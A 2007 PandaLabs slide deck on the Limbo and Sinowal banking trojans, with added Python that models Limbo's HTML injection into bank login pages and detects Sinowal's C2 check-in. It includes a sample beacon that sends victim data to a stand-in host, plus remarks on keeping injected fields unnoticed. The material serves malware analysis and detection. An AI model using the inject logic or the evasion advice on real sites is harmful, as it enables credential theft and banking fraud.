8/14/2019 Panda eCrime2007
http://slidepdf.com/reader/full/panda-ecrime2007 1/20
Banking Targeted Attack Techniques
Pedro Bustamante
Sr. Research Advisor
Case I: Limbo 1.5
• First discovered January 20, 2007 via the “Targeted Attack Alert Services” of PandaLabs.
• Affects multiple financial institutions.
• Now detected as Trj/Bakolimb.A
• Consists of 3 main components:
  • Helper.XML
  • Helper.DLL
  • Control Server and Control Panel
Limbo 1.5
Helper.XML
• Configuration file that contains the HTML code to inject.
• Defines the HTML code injection per institution.
• Optional parameters (block, check, quan, content).
Limbo 1.5
Helper.DLL
Installs as an Internet Explorer Browser Helper Object (BHO)
• Monitors all browsing activity.
• Monitors the CortalConsors.de online broker by default.
Keylogger Functionality
• Harvests Windows Protected Storage (saved passwords).
• Deletes cookies.
• Drops the captured information in a text file.
• Different dump format depending on the variant.
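The two components above work together: the BHO sees every page the browser loads, and Helper.XML tells it which institution's pages to modify and what HTML to add. The following is an added example, not Panda's code and not code from the trojan, that models that flow in Python together with the defender-side check that exposes it. The XML schema, the element and attribute names, and the meaning given to the optional parameters `check` and `block` are assumptions for illustration (the slides do not show the real Helper.XML format; `quan` and `content` are not modelled). The config and the login page are constructed samples.

```python
# Added example (not Panda's code, not the trojan's): a minimal model of how a
# Helper.XML-style per-institution injection config is applied to pages the
# BHO sees, plus the defender-side check that exposes it.  The XML schema,
# element/attribute names and the meaning of "check" and "block" below are
# assumptions for illustration; the real Helper.XML format is not shown on the
# slides, and "quan"/"content" are not modelled.
import re
import xml.etree.ElementTree as ET

# Constructed sample config (assumed schema):
#   <inject url="..." check="..." block="...">HTML to inject</inject>
#   url   - substring that selects the institution's site
#   check - optional marker that must be present in the page before injecting
#   block - optional anchor after which the HTML is inserted; by default the
#           HTML goes just before the first </form>
SAMPLE_CONFIG = """<helper>
  <inject url="bank.example/login" check='name="password"'>
    &lt;input type="text" name="pin" placeholder="Transaction PIN"&gt;
  </inject>
  <inject url="broker.example" block='&lt;div id="login">'>
    &lt;input type="text" name="tan"&gt;
  </inject>
</helper>"""

# Constructed sample login page as the bank would serve it.
SAMPLE_PAGE = """<html><body>
<form action="/login" method="post">
<input type="text" name="user">
<input type="password" name="password">
<input type="submit" value="Login">
</form>
</body></html>"""


def load_rules(xml_text: str) -> list:
    """Parse the config into one rule dict per <inject> element."""
    root = ET.fromstring(xml_text)
    return [
        {
            "url": el.get("url", ""),
            "check": el.get("check"),
            "block": el.get("block"),
            "html": (el.text or "").strip(),
        }
        for el in root.iter("inject")
    ]


def apply_injections(url: str, html: str, rules: list) -> str:
    """What the BHO does per page: inject the configured HTML for matching sites."""
    for rule in rules:
        if rule["url"] not in url:
            continue                       # not this institution
        if rule["check"] and rule["check"] not in html:
            continue                       # page is not the expected form, skip
        if rule["block"]:
            pos = html.find(rule["block"])
            if pos < 0:
                continue
            pos += len(rule["block"])      # insert right after the anchor
        else:
            pos = html.lower().find("</form>")
            if pos < 0:
                continue
        html = html[:pos] + rule["html"] + "\n" + html[pos:]
    return html


INPUT_NAME = re.compile(r'<input[^>]*\bname="([^"]+)"', re.I)


def extra_input_fields(served: str, rendered: str) -> list:
    """Defender's check: input names present in the page the browser renders
    but absent from the HTML the bank actually served (a man-in-the-browser
    injection leaves exactly this kind of residue)."""
    return sorted(set(INPUT_NAME.findall(rendered)) - set(INPUT_NAME.findall(served)))


if __name__ == "__main__":
    rules = load_rules(SAMPLE_CONFIG)
    injected = apply_injections("https://bank.example/login", SAMPLE_PAGE, rules)
    print(injected)
    print("fields added by injection:", extra_input_fields(SAMPLE_PAGE, injected))
```

The point of the `check` marker is operational: the injection only fires when the page looks like the login form the operator tested against, which keeps the extra field from appearing on unrelated pages where a user or a support desk would notice it. The defender-side comparison of served HTML against the rendered DOM is the mirror image of that: any input the server never sent is evidence of tampering in the browser.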
Limbo 1.5
Remote Control Panel
• Filter by COUNTRY, IP or UID.
• View captured logs, delete logs, execute commands, …
Limbo 1.5
Remote Control Panel
• Infection logs and statistics.
• Approximately 2,000 newly infected PCs per day.
Limbo 1.5
Remote Control Panel
• Utility to create and print credit cards.
• Stolen credit card data.
Case II: Sinowal
• First discovered March 7, 2007 via the “Targeted Attack Alert Services” of PandaLabs.
• Affects multiple financial institutions.
• Now detected as a Trj/Sinowal variant.
• Most interesting characteristics:
  • Custom-made runtime packer
  • Trojan-independent monitoring of bank URLs
Sinowal
Remote “JIT” Monitoring Functionality
• Infected client -> malicious server
• Monitors browsing activity
• Sends encrypted URL to server
• Example check-in request:
  POST /gamma/x25.php?id=2E0345322FDD1D09C728CC9840F922FA&sv=53&build=Build%20VASi&ts=1130334165&ip=192.168.200.27&sport=3891&hport=4011&os=5.1.2600&cn=Norway HTTP/1.1
• Static User-Agent: Mozilla/4.0
• Static Content-Type boundary of “--swefasvqdvwxff”
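The static request shape on this slide is what makes Sinowal's check-in detectable on the wire: a fixed script path, a fixed set of query parameters, a bare “Mozilla/4.0” User-Agent and a hard-coded multipart boundary. The following is an added example, not PandaLabs' code, that turns those indicators into detection logic in Python and runs it over constructed sample HTTP requests. The beacon sample reuses the parameter values from the slide; its Host header, the benign request, and the rule that three matching indicators are needed before alerting are assumptions of the example.

```python
# Added example (not PandaLabs' code): detection logic for the Sinowal
# check-in request described on the slide, run over constructed sample HTTP
# requests.  Indicators are the ones the slide lists: a POST to /gamma/x25.php
# with a fixed set of query parameters, a static User-Agent of "Mozilla/4.0"
# and a static multipart boundary "swefasvqdvwxff".  The beacon sample reuses
# the slide's parameter values; its Host header and the benign request are
# constructed.
import re
from datetime import datetime, timezone
from typing import Optional
from urllib.parse import parse_qs, urlsplit

SINOWAL_PARAMS = {"id", "sv", "build", "ts", "ip", "sport", "hport", "os", "cn"}
SINOWAL_BOUNDARY = "swefasvqdvwxff"   # the slide shows it as "--swefasvqdvwxff"
HEX32 = re.compile(r"[0-9A-Fa-f]{32}")

SAMPLE_BEACON = (
    "POST /gamma/x25.php?id=2E0345322FDD1D09C728CC9840F922FA&sv=53"
    "&build=Build%20VASi&ts=1130334165&ip=192.168.200.27"
    "&sport=3891&hport=4011&os=5.1.2600&cn=Norway HTTP/1.1\r\n"
    "Host: c2.invalid\r\n"
    "User-Agent: Mozilla/4.0\r\n"
    "Content-Type: multipart/form-data; boundary=--swefasvqdvwxff\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)
SAMPLE_BENIGN = (
    "POST /upload.php HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 5.1)\r\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWx\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def multipart_boundary(content_type: str) -> Optional[str]:
    """Boundary parameter with quotes and leading dashes removed, or None."""
    for part in content_type.split(";")[1:]:
        key, _, value = part.strip().partition("=")
        if key.lower() == "boundary":
            return value.strip('"').lstrip("-")
    return None


def score_sinowal(raw: str) -> list:
    """Return the indicators matched by this request (empty list = no match)."""
    method, target, headers, _ = parse_request(raw)
    hits = []
    if method != "POST":
        return hits
    parts = urlsplit(target)
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    if parts.path.endswith("/x25.php"):
        hits.append("path")
    if SINOWAL_PARAMS <= set(params):
        hits.append("params")
    if HEX32.fullmatch(params.get("id", "")):
        hits.append("id-format")       # 32-hex id as in the slide's sample
    if headers.get("user-agent") == "Mozilla/4.0":
        hits.append("user-agent")
    if multipart_boundary(headers.get("content-type", "")) == SINOWAL_BOUNDARY:
        hits.append("boundary")
    return hits


def is_sinowal_beacon(raw: str) -> bool:
    """A bare "Mozilla/4.0" UA is common in old tooling, so require several
    indicators rather than any single one (threshold is an assumption)."""
    return len(score_sinowal(raw)) >= 3


def beacon_fields(raw: str) -> dict:
    """Triage view of a beacon: the query parameters, with ts turned into UTC."""
    _, target, _, _ = parse_request(raw)
    fields = {k: v[0] for k, v in parse_qs(urlsplit(target).query).items()}
    if fields.get("ts", "").isdigit():
        fields["ts"] = datetime.fromtimestamp(int(fields["ts"]), tz=timezone.utc).isoformat()
    return fields


if __name__ == "__main__":
    for name, req in (("beacon", SAMPLE_BEACON), ("benign", SAMPLE_BENIGN)):
        print(name, is_sinowal_beacon(req), score_sinowal(req))
    print(beacon_fields(SAMPLE_BEACON))
```

The boundary comparison strips leading dashes on purpose: the slide quotes the value with its “--” prefix, and a multipart body line carries the dashes while the Content-Type header may or may not, so matching on the bare token catches both. `beacon_fields` is the triage side: the `cn`, `os` and `ip` parameters give an analyst the victim's country, Windows version and address straight from the request, and `ts` decoded as a Unix timestamp gives the client's clock at check-in.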
Pedro Bustamante
Sr. Research Advisor
Thanks !!
Panda Research Blog: http://research.pandasoftware.com
Banking Targeted Attack Techniques